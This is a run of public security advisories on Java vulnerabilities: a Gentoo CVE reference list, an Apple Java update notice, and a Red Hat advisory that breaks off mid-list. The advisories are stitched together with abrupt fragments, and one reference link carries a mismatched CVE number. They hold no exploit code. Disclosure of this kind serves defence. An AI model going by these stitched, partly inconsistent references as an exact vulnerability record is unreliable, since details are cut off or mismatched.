http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4471\n[ 30 ] CVE-2010-4472\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4472\n[ 31 ] CVE-2010-4476\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4476\n[ 32 ] CVE-2011-0025\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0025\n[ 33 ] CVE-2011-0706\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0706\n[ 34 ] CVE-2011-0815\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0815\n[ 35 ] CVE-2011-0822\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0822\n[ 36 ] CVE-2011-0862\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0862\n[ 37 ] CVE-2011-0864\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0864\n[ 38 ] CVE-2011-0865\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0865\n[ 39 ] CVE-2011-0868\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0868\n[ 40 ] CVE-2011-0869\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0869\n[ 41 ] CVE-2011-0870\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0870\n[ 42 ] CVE-2011-0871\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0871\n[ 43 ] CVE-2011-0872\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0872\n[ 44 ] CVE-2011-3389\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3389\n[ 45 ] CVE-2011-3521\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3521\n[ 46 ] CVE-2011-3544\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3544\n[ 47 ] CVE-2011-3547\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3547\n[ 48 ] CVE-2011-3548\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3548\n[ 49 ] CVE-2011-3551\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3551\n[ 50 ] CVE-2011-3552\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3552\n[ 51 ] CVE-2011-3553\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3553\n[ 52 ] CVE-2011-3554\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3554\n[ 53 ] CVE-2011-3556\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3556\n[ 54 ] CVE-2011-3557\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3557\n[ 55 ] CVE-2011-3558\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3558\n[ 56 ] CVE-2011-3560\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3560\n[ 57 ] CVE-2011-3563\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3563\n[ 58 ] CVE-2011-3571\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3571\n[ 59 ] CVE-2011-5035\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-5035\n[ 60 ] CVE-2012-0497\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0497\n[ 61 ] CVE-2012-0501\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0501\n[ 62 ] CVE-2012-0502\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0502\n[ 63 ] CVE-2012-0503\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0503\n[ 64 ] CVE-2012-0505\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0505\n[ 65 ] CVE-2012-0506\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0506\n[ 66 ] CVE-2012-0547\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0547\n[ 67 ] CVE-2012-1711\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1711\n[ 68 ] CVE-2012-1713\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1713\n[ 69 ] CVE-2012-1716\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1716\n[ 70 ] CVE-2012-1717\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1717\n[ 71 ] CVE-2012-1718\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1718\n[ 72 ] CVE-2012-1719\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1719\n[ 73 ] CVE-2012-1723\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1723\n[ 74 ] CVE-2012-1724\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1724\n[ 75 ] CVE-2012-1725\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1725\n[ 76 ] CVE-2012-1726\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1726\n[ 77 ] CVE-2012-3216\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3216\n[ 78 ] CVE-2012-3422\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3422\n[ 79 ] CVE-2012-3423\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3423\n[ 80 ] CVE-2012-4416\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4416\n[ 81 ] CVE-2012-4540\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4540\n[ 82 ] CVE-2012-5068\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5068\n[ 83 ] CVE-2012-5069\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5069\n[ 84 ] CVE-2012-5070\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5070\n[ 85 ] CVE-2012-5071\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5071\n[ 86 ] CVE-2012-5072\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5072\n[ 87 ] CVE-2012-5073\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5073\n[ 88 ] CVE-2012-5074\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5074\n[ 89 ] CVE-2012-5075\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5075\n[ 90 ] CVE-2012-5076\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5076\n[ 91 ] CVE-2012-5077\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5077\n[ 92 ] CVE-2012-5081\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5081\n[ 93 ] CVE-2012-5084\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5084\n[ 94 ] CVE-2012-5085\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5085\n[ 95 ] CVE-2012-5086\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5086\n[ 96 ] CVE-2012-5087\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5087\n[ 97 ] CVE-2012-5089\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5089\n[ 98 ] CVE-2012-5979\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5979\n[ 99 ] CVE-2013-0169\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0169\n[ 100 ] CVE-2013-0401\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0401\n[ 101 ] CVE-2013-0424\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0424\n[ 102 ] CVE-2013-0425\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0425\n[ 103 ] CVE-2013-0426\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0426\n[ 104 ] CVE-2013-0427\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0427\n[ 105 ] CVE-2013-0428\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0428\n[ 106 ] CVE-2013-0429\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0429\n[ 107 ] CVE-2013-0431\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0431\n[ 108 ] CVE-2013-0432\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0432\n[ 109 ] CVE-2013-0433\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0433\n[ 110 ] CVE-2013-0434\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0434\n[ 111 ] CVE-2013-0435\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0435\n[ 112 ] CVE-2013-0440\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0440\n[ 113 ] CVE-2013-0441\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0441\n[ 114 ] CVE-2013-0442\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0442\n[ 115 ] CVE-2013-0443\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0443\n[ 116 ] CVE-2013-0444\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0444\n[ 117 ] CVE-2013-0450\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0450\n[ 118 ] CVE-2013-0809\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0809\n[ 119 ] CVE-2013-1475\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1475\n[ 120 ] CVE-2013-1476\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1476\n[ 121 ] CVE-2013-1478\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1478\n[ 122 ] CVE-2013-1480\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1480\n[ 123 ] CVE-2013-1484\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1484\n[ 124 ] CVE-2013-1485\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1485\n[ 125 ] CVE-2013-1486\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1486\n[ 126 ] CVE-2013-1488\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1488\n[ 127 ] CVE-2013-1493\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1493\n[ 128 ] CVE-2013-1500\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1500\n[ 129 ] CVE-2013-1518\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1518\n[ 130 ] CVE-2013-1537\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1537\n[ 131 ] CVE-2013-1557\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1557\n[ 132 ] CVE-2013-1569\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1569\n[ 133 ] CVE-2013-1571\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1571\n[ 134 ] CVE-2013-2383\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2383\n[ 135 ] CVE-2013-2384\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2384\n[ 136 ] CVE-2013-2407\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2407\n[ 137 ] CVE-2013-2412\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2412\n[ 138 ] CVE-2013-2415\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2415\n[ 139 ] CVE-2013-2417\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2417\n[ 140 ] CVE-2013-2419\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2419\n[ 141 ] CVE-2013-2420\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2420\n[ 142 ] CVE-2013-2421\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2421\n[ 143 ] CVE-2013-2422\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2422\n[ 144 ] CVE-2013-2423\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2423\n[ 145 ] CVE-2013-2424\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2424\n[ 146 ] CVE-2013-2426\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2426\n[ 147 ] CVE-2013-2429\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2429\n[ 148 ] CVE-2013-2430\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2430\n[ 149 ] CVE-2013-2431\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2431\n[ 150 ] CVE-2013-2436\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2436\n[ 151 ] CVE-2013-2443\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2443\n[ 152 ] CVE-2013-2444\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2444\n[ 153 ] CVE-2013-2445\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2445\n[ 154 ] CVE-2013-2446\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2446\n[ 155 ] CVE-2013-2447\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2447\n[ 156 ] CVE-2013-2448\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2448\n[ 157 ] CVE-2013-2449\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2449\n[ 158 ] CVE-2013-2450\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2450\n[ 159 ] CVE-2013-2451\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2451\n[ 160 ] CVE-2013-2452\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2452\n[ 161 ] CVE-2013-2453\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2453\n[ 162 ] CVE-2013-2454\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2454\n[ 163 ] CVE-2013-2455\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2455\n[ 164 ] CVE-2013-2456\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2456\n[ 165 ] CVE-2013-2457\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2457\n[ 166 ] CVE-2013-2458\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2458\n[ 167 ] CVE-2013-2459\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2459\n[ 168 ] CVE-2013-2460\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2460\n[ 169 ] CVE-2013-2461\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2461\n[ 170 ] CVE-2013-2463\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2463\n[ 171 ] CVE-2013-2465\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2465\n[ 172 ] CVE-2013-2469\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2469\n[ 173 ] CVE-2013-2470\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2470\n[ 174 ] CVE-2013-2471\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2471\n[ 175 ] CVE-2013-2472\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2472\n[ 176 ] CVE-2013-2473\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2473\n[ 177 ] CVE-2013-3829\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3829\n[ 178 ] CVE-2013-4002\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4002\n[ 179 ] CVE-2013-5772\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5772\n[ 180 ] CVE-2013-5774\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5774\n[ 181 ] CVE-2013-5778\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5778\n[ 182 ] CVE-2013-5780\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5780\n[ 183 ] CVE-2013-5782\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5782\n[ 184 ] CVE-2013-5783\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5783\n[ 185 ] CVE-2013-5784\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5784\n[ 186 ] CVE-2013-5790\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5790\n[ 187 ] CVE-2013-5797\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5797\n[ 188 ] CVE-2013-5800\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5800\n[ 189 ] CVE-2013-5802\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5802\n[ 190 ] CVE-2013-5803\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5803\n[ 191 ] CVE-2013-5804\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5804\n[ 192 ] CVE-2013-5805\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5805\n[ 193 ] CVE-2013-5806\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5806\n[ 194 ] CVE-2013-5809\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5809\n[ 195 ] CVE-2013-5814\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5814\n[ 196 ] CVE-2013-5817\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5817\n[ 197 ] CVE-2013-5820\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5820\n[ 198 ] CVE-2013-5823\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5823\n[ 199 ] CVE-2013-5825\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5825\n[ 200 ] CVE-2013-5829\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5829\n[ 201 ] CVE-2013-5830\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5830\n[ 202 ] CVE-2013-5840\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5840\n[ 203 ] CVE-2013-5842\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5842\n[ 204 ] CVE-2013-5849\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5849\n[ 205 ] CVE-2013-5850\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5850\n[ 206 ] CVE-2013-5851\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5851\n[ 207 ] CVE-2013-6629\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6629\n[ 208 ] CVE-2013-6954\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6954\n[ 209 ] CVE-2014-0429\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0429\n[ 210 ] CVE-2014-0446\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0446\n[ 211 ] CVE-2014-0451\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0451\n[ 212 ] CVE-2014-0452\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0452\n[ 213 ] CVE-2014-0453\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0453\n[ 214 ] CVE-2014-0456\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0456\n[ 215 ] CVE-2014-0457\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0457\n[ 216 ] CVE-2014-0458\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0458\n[ 217 ] CVE-2014-0459\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0459\n[ 218 ] CVE-2014-0460\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0460\n[ 219 ] CVE-2014-0461\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0461\n[ 220 ] CVE-2014-1876\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1876\n[ 221 ] CVE-2014-2397\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2397\n[ 222 ] CVE-2014-2398\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2398\n[ 223 ] CVE-2014-2403\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2403\n[ 224 ] CVE-2014-2412\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2412\n[ 225 ] CVE-2014-2414\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2414\n[ 226 ] CVE-2014-2421\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2421\n[ 227 ] CVE-2014-2423\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2423\n[ 228 ] CVE-2014-2427\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2427\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n http://security.gentoo.org/glsa/glsa-201406-32.xml\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2014 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nAPPLE-SA-2013-06-18-1 Java for OS X 2013-004 and\nMac OS X v10.6 Update 16\n\nJava for OS X 2013-004 and Mac OS X v10.6 Update 16 is now available\nand addresses the following:\n\nJava\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,\nOS X Lion v10.7 or later, OS X Lion Server v10.7 or later,\nOS X Mountain Lion 10.8 or later\nImpact: Multiple vulnerabilities in Java 1.6.0_45\nDescription: 8011782 Multiple vulnerabilities existed in Java\n1.6.0_45, the most serious of which may allow an untrusted Java\napplet to execute arbitrary code outside the Java sandbox. Visiting a\nweb page containing a maliciously crafted untrusted Java applet may\nlead to arbitrary code execution with the privileges of the current\nuser. These issues were addressed by updating to Java version\n1.6.0_51. Further information is available via the Java website at ht\ntp://www.oracle.com/technetwork/java/javase/releasenotes-136954.html\nCVE-ID\nCVE-2013-1500\nCVE-2013-1571\nCVE-2013-2407\nCVE-2013-2412\nCVE-2013-2437\nCVE-2013-2442\nCVE-2013-2443\nCVE-2013-2444\nCVE-2013-2445\nCVE-2013-2446\nCVE-2013-2447\nCVE-2013-2448\nCVE-2013-2450\nCVE-2013-2451\nCVE-2013-2452\nCVE-2013-2453\nCVE-2013-2454\nCVE-2013-2455\nCVE-2013-2456\nCVE-2013-2457\nCVE-2013-2459\nCVE-2013-2461\nCVE-2013-2463\nCVE-2013-2464\nCVE-2013-2465\nCVE-2013-2466\nCVE-2013-2468\nCVE-2013-2469\nCVE-2013-2470\nCVE-2013-2471\nCVE-2013-2472\nCVE-2013-2473\nCVE-2013-3743\nCVE_2013-2445\n\n\nJava for OS X 2013-004 and Mac OS X v10.6 Update 16\nmay be obtained from the Software Update pane in System Preferences,\nMac App Store, or Apple\u0027s Software Downloads web site:\nhttp://www.apple.com/support/downloads/\n\nFor Mac OS X v10.6 systems\nThe download file is named: JavaForMacOSX10.6.Update16.dmg\nIts SHA-1 digest is: a6b5a9caa3c0d9acf743da8e4c0e5cfe4e471b01\n\nFor OS X Lion and Mountain Lion systems\nThe download file is named: JavaForOSX2013-004.dmg\nIts SHA-1 digest is: 153c3f74d5285d10008fce2004d904da8d2ffdff\n\nInformation will also be posted to the Apple Security Updates\nweb site: http://support.apple.com/kb/HT1222\n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG/MacGPG2 v2.0.17 (Darwin)\nComment: GPGTools - http://gpgtools.org\n\niQIcBAEBAgAGBQJRwL5AAAoJEPefwLHPlZEwju0QALM1IST/ATt2xR1L0AQcaZRX\neiM07MlvAlE9Jv45xqKLUezRU8XQT6+glN51/hBhpyCa8MJIzPiSnnOIAW+vbA5o\nRjXQTGPGT1IPSfEk7OWS++566riMLmTOvg45Qn0E/ibOqJHpfrR4wzQX5jpv7lzH\nEbdKxn+KWfHCF2y/2LCFifDHUBPCjUlbWTRznDCYVHsFbtDiP/vAZiSXsNJtLTXK\nUOD/eGbel2PEqWOOsUNIrzwvztRB+LsYT4xKQQnsEKJqoyMch/UgB1Uo2jgEPn0U\nYP3WZbjbDV+UcM+yMoCV/qDFhbJ+qBxTbuwYOHuSDpgqJ7vF8s0cdUUb6U7QLW4/\n3ykC7vOUS/JqYkiqwUxuKVpzSUYXrlez36sQuwCR9AOGCJ/0/MwM8QPavFAdGisP\n36ZavJ4k2Dp2CfVmWjexpWY7XN9M36Lh57XChxQk9TcbjUJRrqNadlPyzaja3G9a\n95Dq1N1dYfLuFm4MtyeDA0xQl8m8ljnSxH3TQoDcTwvvWGIGdG7EEVpdQqM/MTWY\nCY2EqMkY3Gouet+QvECYwxOz+g0hcaJd973kSM+5AJ7tVfod93NDW3P13k2cfdTC\nuo9IgGkhuNY40NuLpJLtTwlHcTCwBtKPt0BLwXugZdoDrgz1j8Q+fLuASSTkUQxl\n3t9MUCG40o5ZQFyWqV1+\n=zFXN\n-----END PGP SIGNATURE-----\n. In a typical operating environment, these are of low security risk as\nthe runtime is not used on untrusted applets. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Critical: java-1.7.0-oracle security update\nAdvisory ID: RHSA-2013:0963-01\nProduct: Red Hat Enterprise Linux Supplementary\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2013-0963.html\nIssue date: 2013-06-20\nCVE Names: CVE-2013-1500 CVE-2013-1571 CVE-2013-2400 \n CVE-2013-2407 CVE-2013-2412 CVE-2013-2437 \n CVE-2013-2442 CVE-2013-2443 CVE-2013-2444 \n CVE-2013-2445 CVE-2013-2446 CVE-2013-2447 \n CVE-2013-2448 CVE-2013-2449 CVE-2013-2450 \n CVE-2013-2451 CVE-2013-2452 CVE-2013-2453 \n CVE-2013-2454 CVE-2013-2455 CVE-2013-2456 \n CVE-2013-2457 CVE-2013-2458 CVE-2013-2459 \n CVE-2013-2460 CVE-2013-2461 CVE-2013-2462 \n CVE-2013-2463 CVE-2013-2464 CVE-2013-2465 \n CVE-2013-2466 CVE-2013-2468 CVE-2013-2469 \n CVE-2013-2470 CVE-2013-2471 CVE-2013-2472 \n CVE-2013-2473 CVE-2013-3744 \n=====================================================================\n\n1. Summary:\n\nUpdated java-1.7.0-oracle packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 5 and 6 Supplementary. \n\nThe Red Hat Security Response Team has rated this update as having critical\nsecurity impact. Common Vulnerability Scoring System (CVSS) base scores,\nwhich give detailed severity ratings, are available for each vulnerability\nfrom the CVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64\nRed Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64\nRed Hat Enterprise Linux HPC Node Supplementary (v. 6) - x86_64\nRed Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64\nRed Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64\n\n3. Further\ninformation about these flaws can be found on the Oracle Java SE Critical\nPatch Update Advisory page, listed in the References section. \n(CVE-2013-1500, CVE-2013-1571, CVE-2013-2400, CVE-2013-2407, CVE-2013-2412,\nCVE-2013-2437, CVE-2013-2442, CVE-2013-2443, CVE-2013-2444, CVE-2013-2445,\nCVE-2013-2446, CVE-2013-2447, CVE-2013-2448, CVE-2013-2449, CVE-2013-2450,\nCVE-2013-2451, CVE-2013-2452, CVE-2013-2453, CVE-2013-2454, CVE-2013-2455,\nCVE-2013-2456, CVE-2013-2457, CVE-2013-2458, CVE-2013-2459, CVE-2013-2460,\nCVE-2013-2461, CVE-2013-2462, CVE-2013-2463, CVE-2013-2464, CVE-2013-2465,\nCVE-2013-2466, CVE-2013-2468, CVE-2013-2469, CVE-2013-2470, CVE-2013-2471,\nCVE-2013-2472, CVE-2013-2473, CVE-2013-3744)\n\nRed Hat would like to thank Tim Brown for reporting CVE-2013-1500, and\nUS-CERT for reporting CVE-2013-1571. US-CERT acknowledges Oracle as the\noriginal reporter of CVE-2013-1571. \n\nAll users of java-1.7.0-oracle are advised to upgrade to these updated\npackages, which provide Oracle Java 7 Update 25 and resolve these issues. \nAll running instances of Oracle Java must be restarted for the update to\ntake effect. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nThis update is available via the Red Hat Network. Details on how to\nuse the Red Hat Network to apply this update are available at\nhttps://access.redhat.com/knowledge/articles/11258\n\n5. Bugs fixed (http://bugzilla.redhat.com/):\n\n973474 - CVE-2013-1571 OpenJDK: Frame injection in generated HTML (Javadoc, 8012375)\n975099 - CVE-2013-2470 OpenJDK: ImagingLib byte lookup processing (2D, 8011243)\n975102 - CVE-2013-2471 OpenJDK: Incorrect IntegerComponentRaster size checks (2D, 8011248)\n975107 - CVE-2013-2472 OpenJDK: Incorrect ShortBandedRaster size checks (2D, 8011253)\n975110 - CVE-2013-2473 OpenJDK: Incorrect ByteBandedRaster size checks 